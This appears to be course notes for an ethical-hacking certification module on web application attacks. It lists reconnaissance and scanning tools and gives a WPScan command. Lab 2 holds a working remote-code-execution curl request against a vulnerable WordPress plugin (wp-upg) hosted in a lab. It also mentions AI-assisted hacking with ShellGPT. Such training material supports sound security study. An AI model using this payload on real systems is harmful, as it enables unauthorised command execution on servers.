Module 14: Hacking Web Applications

Ethical hackers or pen testers use numerous tools and techniques to perform web application attacks on the target web application. Recommended labs that will assist you in learning various web application attack techniques include:

1. Footprint the web infrastructure

   • Perform web application reconnaissance using Nmap and Telnet

   • Perform web spidering using OWASP ZAP

   • Perform web application vulnerability scanning using SmartScanner

2. Perform web application attacks

   • Perform a brute-force attack using Burp Suite

   • Perform Remote Code Execution (RCE) attack

3. Detect web application vulnerabilities using various web application security tools

   • Detect web application vulnerabilities using wapiti web application security scanner

4. Perform Web Application Hacking using AI.

   • Perform web application hacking using ShellGPT.

Lab 1: Footprint the Web Infrastructure

Task 1: Perform Web Application Reconnaissance using Nmap and Telnet

## Tools can be used in this section :  (WHOIS LOOKUP)
1. Netcraft (https://www.netcraft.com)
2. SmartWhois (https://www.tamos.com)
3. WHOIS Lookup (https://whois.domaintools.com)
4. Batch IP Converter (http://www.sabsoft.com) 

## Tools used in this section : 
1. Nmap
2. OWASP ZAP
3. Smartscanner (Windows)
4. WPScan Vulnerability Database (https://wpscan.com)
5. Codename SCNR (https://ecsypno.com)
6. AppSpider (https://www.rapid7.com)
7. Uniscan (https://github.com)
8. N-Stalker (https://www.nstalker.com)

Lab 2: Perform Web Application Attacks

Task 1: Perform a Brute-force Attack using Burp Suite

BURP Interuder based password bruteforcing

Task 2: Perform Remote Code Execution (RCE) Attack

Vulnerable wordpress is hosted on [target]/CEH
Vulnerable wordpress plugin  : 
    User Post Gallery (wp-upg)

• Wordpress scanner (WP Scan)

 wpscan --url http://10.10.1.22:8080/CEH --api-token [API Token]
 Payload: 
    curl -i 'http://10.10.1.22:8080/CEH/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:whoami:NULL:NULL'

Lab 3: Detect Web Application Vulnerabilities using Various Web Application Security Tools

1. Wapiti3

cd wapiti
    python3 -m venv wapiti3
     . wapiti3/bin/activate
     pip install .

wapiti -u https://www.certifiedhacker.com
  cd /root/.wapiti/generated_report/ 

Lab 4: Perform Web Application Hacking using AI

Tools used in this section : 
1. wafwoof
2. Sn1per tool
3. Dirb
4. Gobuster
5. Wfuzz